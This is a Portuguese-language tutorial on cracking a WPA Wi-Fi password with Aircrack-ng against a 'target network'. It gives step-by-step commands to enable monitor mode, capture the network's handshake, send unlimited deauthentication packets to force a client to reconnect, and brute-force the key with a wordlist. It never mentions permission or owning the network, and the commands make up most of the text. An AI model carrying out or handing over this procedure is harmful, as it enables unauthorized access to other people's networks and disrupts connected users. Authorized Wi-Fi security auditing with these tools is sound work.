Neste procedimento vamos abordar de forma rápida:
-  Monitoramento de uma Rede Wi-fi 
-  Captura de pacotes de autenticação 
-  Uso de Brute Force para descobrir a senha. 
O que é o Aircrack-ng
Aircrack-ng é um conjunto completo de ferramentas para avaliar a segurança da rede WiFi.
Concentra-se em diferentes áreas de segurança Wi-Fi:
-  Monitoramento: a captura de pacotes e exportação de dados para arquivos de texto para processamento adicional por ferramentas de terceiros. 
-  Atacando: ataques replay, deauthentication, pontos de acesso falsos e outros através de injeção de pacote. 
-  Teste: verificar cartões Wi-Fi e capacidades do driver (captura e injeção). 
-  Cracking: WEP e WPA PSK (WPA 1 e 2). 
Todas as ferramentas são a linha de comando que permite a criação de scripts pesados. Um monte de GUIs têm aproveitado esse recurso. Ele trabalha principalmente 
Linux, mas também o Windows, OS X, FreeBSD, OpenBSD, NetBSD, bem como Solaris e até mesmo eComStation 2.
Vamos iniciar!
Descubra qual e a interface de rede que sua placa wifi esta utilizando:
 iwconfig
Você deve ter algo tipo wlan0, wlp4s0 etc.
Vamos finalizar quaisquer processos que possam causar problemas no modo monitor:
# airmon-ng check kill
Agora vamos iniciar o modo monitor:
# airmon-ng start wlan0
Obs.: wlan0 varia de acordo com sua interface de rede.
Após iniciar no modo monitor uma nova interface é carregada no modo monitor, algo tipo mon0, mon1...
Agora vamos verificar quais são as redes disponíveis:
# airodump-ng mon0
O que interessa aqui é o CHANNEL e a BSSID da rede.
Agora vamos direcionar o airodump-ng para capturar os pacotes referentes a rede desejada.
Usaremos o comando abaixo:
# airodump-ng -c 6 --bssid 80:C6:AB:53:9C:99 -w arquivo mon0
Sendo:
-   -c 6 > canal 6 
-   --bssid > endereco mac do modem da rede alvo 
-   -w > referente a write (gravar), irá gravar o arquivo da captura de pacotes 
-   mon1 > endereco da sua placa de rede wifi (do seu computador etc) 
Enquanto o terminal está aberto com com o programa acima em execução, você já esta capturando handshakes, que são pacotes de autenticação da rede.
O programa captura este handshake para que possamos usá-lo para forçar autenticação através de brute force. Mas este handshake só e capturado quando um dos clientes da rede se conecta ou reconecta a rede.
Caso isso seja difícil, você pode forçar um dos clientes a se reautenticar à rede, ou seja, se reconectar.
Para forçar a reautenticação:
# aireplay-ng -0 0 -a 80:C6:AB:53:9C:99 -c A8:9F:BA:02:3C:99 mon1
Sendo:
-   -0 > Desautenticacao 
-   0 > Número infinito de injeções 
-   -a > MAC do roteador Wifi da rede alvo 
-   -c > MAC de um dos clientes da rede alvo 
Terminadas as capturas, você irá descobrir se conseguiu capturar um handshake através do programa aircrack-ng.
Vamos iniciar o ataque Brute Force, na rede alvo, para descobrir a senha:
# aircrack-ng arquivo-01.cap -w numeros.txt
Sendo:
-   arquivo-01.cap > handshake capturado 
-   -w numeros.txt > indica a wordlist a ser usada 
Obs.: deve ser informado com o caminho completo da wordlist, caso esteja em outra pasta. A wordlist citada aqui você já deve ter visto como criar a sua você mesmo neste tutorial.
Após concluído o procedimento, você dever ter uma mensagem retornando com a senha da rede, indicando Key Found, traduzido, chave encontrada!
O procedimento pode demorar de acordo com:
-  O nível de dificuldade da senha 
-  A qualidade do sinal 
-  E o tamanho da wordlist utilizada